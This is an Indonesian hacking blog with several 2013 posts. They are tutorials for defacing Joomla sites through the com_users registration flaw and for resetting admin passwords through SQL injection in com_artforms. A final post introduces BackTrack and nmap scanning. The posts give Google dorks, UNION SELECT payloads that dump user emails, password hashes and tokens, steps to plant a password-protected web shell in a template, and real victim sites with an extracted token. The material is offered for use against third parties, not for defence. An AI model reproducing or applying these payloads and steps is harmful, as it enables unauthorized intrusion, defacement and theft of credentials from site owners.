Electronic currency exchanger list Belajar Bersama: Exploit
Showing posts with label Exploit. Show all posts
Showing posts with label Exploit. Show all posts

Wednesday, 25 September 2013

Exploit Joomla Com_user terbaru 2013

22:27
ok kareyak dari kalian yang meminta tutor deface dengan trik com_user, kali ini saya akan memberi gambaran tentang deface dengan com_user. ok langsung ja ke TKP

1. Download dulu xploit joomla
Exploit 1
Exploit 2

Exploit 1 atau 2 sama saja,cuma beda tampilanya aja kok... :D
dan download shell 1n73ction Disini

Dork:

inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br
site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management site:
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
intext:joomla! 1.7 - open source content management site:jp
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
inurl:index.php/19-sample-data-articles/joomla site:com

Jangan Lupa Dork kembangin lagi :)

Exploit :
index.php?option=com_users&view=registration

selanjutnya cari target vuln dengan dork diatas. yang kalian perlu tau perbedaan site vul dengan tidak vuln liat gambar berikut :

Kali ini saya sudah dapat target http://esv.be
lalu kita exploit sehingga menjadi http://esv.be/%20index.php?option=com_users&view=registration
dan tampilanya menjadi seperti gambar


 setelah itu tekan ctrl+u dan kemudian tekan ctrl+f lalu ketik "hidden" (tanpa tanda petik)
dan cari kode seperti yang saya tunjuk panah merah itu


 setelah ketemu,buka file xploit yang kamu download tadi buka ke notepad,lalu copy code yang seperti digambar diatas dan pastekan di file exploit tadi. lihat gambar


ok setelah itu copy juga url web target http://gym-megal.tri.sch.gr dan pastekan di file exploit. lihatr gambar


nb: ganti tulisan test@gmail dengan alamat gmail kamu,atas bawah harus sama ya... :) ok lanjut
setela itu klik save.
kemudian cari dimana kamu menyimpan file exploit tadi dan klik 2 x jadi seperti ini

dan klik Register
Nanti kalian akan dibawa ke halaman register lagi. isi passwordnya sesukamu. lihat gambar

pada kali ini pssword ane ini "kacang",dan klik yang register pada tnda merah itu artinya register,jika vuln maka akan seperi gambar


dan link konfirmasi akan dikirim ke email kamu.

sekarang kita buka email kita liaht pada kotak masuk apakah sudah terkirim link konfirmasi apa blm
ok setelah link konfirmsi msuk ke email kita kita klik link nya. Lihat gambar


setelah di klik nanti akan di arahkan kesini. lihat gambar


isikan user name : genesis
password : kacang

sesuai dengan yang di email yang kita terima tadi, setelah login akan seperti ini. lihat gambar

Ok registrasi selesai,,,ada pertanyaan sampai sini..???
kalu ga ada kita lanjut ke halaman administratornya http://esv.be/administrator/
Masukkan username : genesis
dan pssword : kacang
lalu klik login
daaaaannn...taraaaaaaa kita masuk ke cpanelnya


lalu klik pada template nya seperti yang saya kasih tanda panah merah itu.

setelah itu klik templates  yang saa beri panah seperti pada gambar di bawah



pilih satu template.kali ini saya memilih "atomic"


setelah di klik lalu klik Wijzigen hoofdpagina template lihat gambar


hapus smua code yang ada pada kotak tersebut


ok...sekarang buka file shell yang kalian download tadi. klik kanan open with notepad.
kopi code script shellnya dan pastekan di kotak tadi lalu klik save. Lihat gambar


jika shell tertanam dan suk sukses akan seperti gambar


saatnya memanggil shell, jadi perintahnya http://esv.be/templates/atomic/index.php dan enter maka akan ada tampilan backdoor. setelah itu tekan Tab pada keyboart atau arahkan kursor ke tengah yang saya beri tanda panah.Lihat gambar


 dan masukan paswordnya 1n73ction dan enter. Lihat gambar

setelah itu anda akan melihat tampilan shell.


setelah itu klik atomic.lihat gambar



cari index.php dan klik edit .Lihat gambar


haspus semua code yang da di dalam kotak dan ganti dengan script deface kamu. Lihat gambar


ubah /customers/4/9/f/esv.be/httpd.www/templates/atomic/index.php menjadi /customers/4/9/f/esv.be/httpd.www/index.php dan klik save.
setelah itu buka url webnya dan silahkan di show offin dah

hasil esv.be/




ok sekian dari saya jangan lupa gabung juga di grup kami
https://www.facebook.com/groups/indonesianhackeranonymous/
https://www.facebook.com/groups/vandetaindonesiananonymousteam/

Terima Kasih

Thursday, 12 September 2013

Joomla com_user Vulnerability Scanner

21:44
Ok,siang ini saya akan membagikan Tool untuk mencari website joomla yang vuln,




password : 1mp4ct_404

Ok sekian dari saya, salam 1mp4ct_404

Tutorial Reset Password Joomla Dengan Token

11:11
Ok malam ini saya akan membagikan trik reset password dengan token,
Siap kan bahan-bahan,
- Kopi
- Kratingdeng
- Rokok
- Cemilan
- Dan sedikit otak untuk berfikir

Langsung saja

Dork >
inurl:"option com_artforms"


Exploit mencari Email >
index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--

Exploit reset >
index.php?option=com_user&view=reset

Exploit mencari token >
index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users


Saya disini mendapat target
http://www.vernonfrost-mu.com

Setelah itu kita exploit untuk mencari Email target sehingga menjadi
http://www.vernonfrost-mu.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--


Dan kita mendapat emailnya



Selanjutnya kita reset dengan memasukan exploit sehingga
http://www.vernonfrost-mu.com/index.php?option=com_user&view=reset

setelah muncul kotak emailnya kamu masukan emailnya dan klik submit


Selanjutnya kita mencari user name dan token,Kita masukan exploitnya sehingga menjadi
http://www.vernonfrost-mu.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users







Tuch,dah keliatan username sama tokenya
username : lsioq
Token     : 5d02jkqwum7e5195e1be311b27f25404a2d55187ab

kita kembali lagi ke sini
http://www.vernonfrost-mu.com/index.php?option=com_user&view=reset

setelah memasukan email dan klik submit tadi maka tmpilanya begini



Setelah itu kalian masukan username dan passwordnya lalu klik submit bila vuln kamu langsung bisa mereset password dan kamu bisa login ke cpanelnya.
Sekian tutorial dari saya semoga bermanfaat.

created by : 1mp4ct_404

Thursday, 18 April 2013

Eksploitasi Jaringan Menggunakan Backtrack

11:07
BackTrack adalah salah satu distro linux yang merupakan turunan dari slackware yang mana merupakan merger dari whax dan auditor security collection.
BackTrack menyediakan akses mudah untuk tools komprehensif yang berhubungan dengan keamanan, mulai dari Port Scanner sampai Password Scanner. Dukungan fungsi Live CD dan Live USB mengijinkan pengguna untuk me-boot BackTrack secara langsung dari media penyimpan portabel tanpa harus melakukan penginstallan pada Hardisk secara permanen.
BackTrack berisi banyak tools keamanan yang terkenal yaitu:
  1. Metasploit integration (Non-Working and Officially Unsupported
  2. RFMON Injection capable wireless drivers
  3. Aircrack-NG
  4. Kismet
  5. Nmap
  6. Ophcrack
  7. Ettercap
  8. Wireshark (formerly known as Ethereal)
  9. BeEF (Browser Exploitation Framework)
  10. Hydra
  11. OWASP Mantra Security Framework collection of hacking tools, add-ons and scripts based on Firefox
  12. Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password.
  13. Quypt (Terminal Emulator) (software pribadi oleh Crimson Hacking group, yang telah dimasukan ke bagian utama) Blackhat
  14. Banyak kumpulan exploits serta software yang lebih umum seperti browsers.
BackTrack membagi tools menjadi 12 kategori:
  • Information Gathering
  • Vulnerability Assessment
  • Exploitation Tools
  • Privilege Escalation
  • Maintaining Access
  • Reverse Engineering
  • RFID Tools
  • Stress testing
  • Forensics
  • Reporting Tools
  • Services
  • Miscellaneous
Untuk dapat menggunakan berbagai macam tools tersebut, tentunya dibutuhkan pengetahuan yang cukup. Untuk itu secara bertahap kita akan coba mengupas bagaimana menggunakan tools tersebut.
Setting Jaringan
Setting jaringan sangat berpengaruh terhadap koneksi antar perangkat dalam jaringan. Di backtrack hal pertama yang harus dilakukan adalah mengalokasi IP Address sehingga backtrack dapat terkoneksi ke jaringan. Untuk setting IP address dapat dilakukan dengan cara :
root@root:~# ifconfig eth0 192.168.197.250 netmask 255.255.255.0
Perintah di atas berfungsi untuk mengalokasi IP Address 192.168.197.250/24 ke ethernet backtrack. Untuk mengetahui IP address yang terpasang gunakan perintah sebagai berikut:
root@root:~# ifconfig

Jika hasil yang ditampilkan seperti gambar di atas, berarti Backtrack sudah memiliki IP Address yaitu 192.168.197.250/24.
Untuk mengetes apakah Backtrack sudah dapat berkomunikasi dengan perangkat lain dalam jaringan, gunakan perintah sebagai berikut :
root@root:~# ping 192.168.197.1
Apabila ada reply dari host 192.168.197.1, artinya anda sudah terhubung ke perangkat dengan IP address tersebut.

Scanning Network dengan NMAP
Scanning network adalah salah satu kegiatan untuk mengetahui host mana saja yang aktif dan terkoneksi ke dalam jaringan. Di Backtrack banyak tools untuk melakukan proses scanning, diantaranya nmap.
Nmap memetakan dan memberikan informasi host yang aktif dan terkoneksi ke dalam jaringan. Semua informasi host yang terkoneksi akan ditampilkan, termasuk port apa saja yang terbuka.
Untuk melakukan scanning dengan nmap gunakan perintah berikut :
root@root:~# nmap 192.168.3.201

Dari gambar terlihat port 80, 135, 139, 443, 445 pada host 192.168.3.201 berstatus open (terbuka). Kita juga mengetahui MAC Address host tersebut yaitu 60:EB:69:CE:71:80.
Semua informasi yang ditampilkan tersebut adalah informasi yang sangat berharga bagi siapa saja yang memiliki “kemampuan lebih” untuk bisa menyusup atau menerobos ke host 192.168.3.201 terlepas dari apa maksud dan alasannya.
Selain scanning IP address dengan target tertentu, nmap dapat juga digunakan untuk melakukan scanning secara keseluruhan atau menurut kelompok IP Address.
root@root:~# nmap 192.168.3.1-254
Hasilnya adalah sebagai berikut :

Berdasarkan gambar di atas terlihat nmap menampilkan informasi setiap host secara detil.